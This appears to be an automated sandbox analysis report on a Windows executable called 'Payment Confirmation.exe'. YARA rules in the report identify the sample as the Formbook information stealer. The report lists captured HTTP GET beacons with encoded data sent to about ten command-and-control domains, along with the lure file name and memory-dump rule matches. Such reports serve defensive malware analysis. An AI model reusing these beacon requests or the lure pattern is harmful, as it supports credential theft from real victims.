          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:33:00 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: Payment Confirmation.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Payment Confirmation.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: msiexec.exe, 0000000B.00000002.630481531.0000000004B72000.00000004.00020000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: unknownDNS traffic detected: queries for: www.playstarexch.com
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1Host: www.playstarexch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1Host: www.anadolu.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1Host: www.altitudebc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1Host: www.unasolucioendesa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1Host: www.elliotpioneer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1Host: www.thesewhitevvalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1Host: www.lumberjackguitarloops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1Host: www.chinaopedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.atp-cayenne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Payment Confirmation.exe, 00000001.00000002.366842319.00000000007FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404FC2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Payment Confirmation.exe
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: Payment Confirmation.exeStatic file information: Suspicious name
          Source: Payment Confirmation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_004030FB
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004047D31_2_004047D3
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004061D41_2_004061D4
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100088561_2_10008856
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10003D101_2_10003D10
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100111011_2_10011101
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000F9221_2_1000F922
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100119CC1_2_100119CC
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100059D11_2_100059D1
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001AA081_2_1001AA08
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001AA171_2_1001AA17
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000B25E1_2_1000B25E
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000FE941_2_1000FE94
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10005EC51_2_10005EC5
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100062DD1_2_100062DD
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100067121_2_10006712
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10006B471_2_10006B47
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000F3B01_2_1000F3B0
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041B8B34_2_0041B8B3
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041D1E94_2_0041D1E9
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041C9834_2_0041C983
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041D2474_2_0041D247
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041D3524_2_0041D352
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041CB6E4_2_0041CB6E
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041CBE64_2_0041CBE6
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041C3B04_2_0041C3B0
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00408C4B4_2_00408C4B
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00408C904_2_00408C90
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041CCB84_2_0041CCB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F841F11_2_044F841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A100211_2_045A1002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB09011_2_044FB090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B1D5511_2_045B1D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EF90011_2_044EF900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E0D2011_2_044E0D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450412011_2_04504120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FD5E011_2_044FD5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04506E3011_2_04506E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451EBB011_2_0451EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046D1E911_2_0046D1E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046C98311_2_0046C983
